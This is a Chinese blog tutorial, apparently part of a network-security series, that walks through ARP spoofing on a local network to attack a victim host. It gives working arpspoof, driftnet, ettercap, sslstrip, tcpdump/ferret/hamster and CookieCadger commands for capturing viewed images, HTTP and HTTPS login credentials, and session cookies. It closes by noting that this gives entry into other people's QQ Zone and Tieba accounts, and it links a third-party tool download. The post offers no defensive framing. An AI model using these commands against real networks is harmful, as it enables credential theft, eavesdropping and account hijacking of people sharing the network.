网络安全Linux

62.利用arp欺骗来攻击局域网内主机(driftnet、ett

2018-10-09  本文已影响0人  扶桑啊啊

前情回顾——ARP攻击:https://www.jianshu.com/p/55f15585cc1a
可利用arp欺骗攻击局域网内的主机
一、获取靶机浏览的图片
1.arp欺骗攻击
2.driftnet 获取本机网卡的图片

echo 1 > /proc/sys/net/ipv4/ip_forward  //冒充过程
arpspoof -i eth0 -t 192.168.252.131 192.168.252.2  //欺骗攻击
driftnet -i eth0

打开driftnet来记录靶机浏览过的图片


driftnet

二、获取靶机http登录账号密码
1.arp欺骗攻击
2.ettercap截取http认证的登录账号与密码

echo 1 > /proc/sys/net/ipv4/ip_forward  //冒充过程
arpspoof -i eth0 -t 192.168.252.131 192.168.252.2  //欺骗攻击
ettercap -Tq -i eth0   //-T 启动文本模式,-q 静默模式,-i 网卡

参考:https://blog.csdn.net/zc19930620/article/details/61642372
三、获取靶机https登录账号密码
1.修改ettercap配置文件

vim /etc/ettercap/etter.conf
  找到#if you use iptables:后面的两个#去掉
image.png

2.将https转为http(此方法只对ie浏览器有效,火狐浏览器会自动过滤,因为我没有ie浏览器,就不做示例了)

sslstrip -a -f -k

3.重复2的过程即可
四、会话劫持
1.arp欺骗
2.tcpdump抓包,保存数据(wireshark也可以)
3.ferret分析数据,重新生成抓包的文件
4.hamster重放流量

echo 1 > /proc/sys/net/ipv4/ip_forward  //冒充过程
arpspoof -i eth0 -t 192.168.252.131 192.168.252.2  //欺骗攻击
tcpdump -i eth0 -A host 192.168.252.131 -w tmp.cap
ferret -r tmp.cap 
hamster 
抓包
重放
修改火狐浏览器代理
修改代理
在浏览器中输入127.0.0.1:1234,打开hamster,用adapters来选择网卡
登录网址
登录网址
五、会话劫持——一键劫持
使用工具CookieCadger-1.08.jar(同一个局域网主机)
下载地址:链接:https://pan.baidu.com/s/1YDmuyC0rspR4Wa41eAOF9w
提取码:pyxd
这个jar小程序,在windows和kali下都可以使用,我在kali下使用的。
java -jar CookieCadger-1.08.jar
cookie_cadger

运行软件之后,靶机(192.168.252.131)登录QQ空间和百度贴吧之后,会自动保存cookie。
在软件上找到带cookie的网址后可直接进入别人的空间。


image.png
上一篇 下一篇

猜你喜欢

热点阅读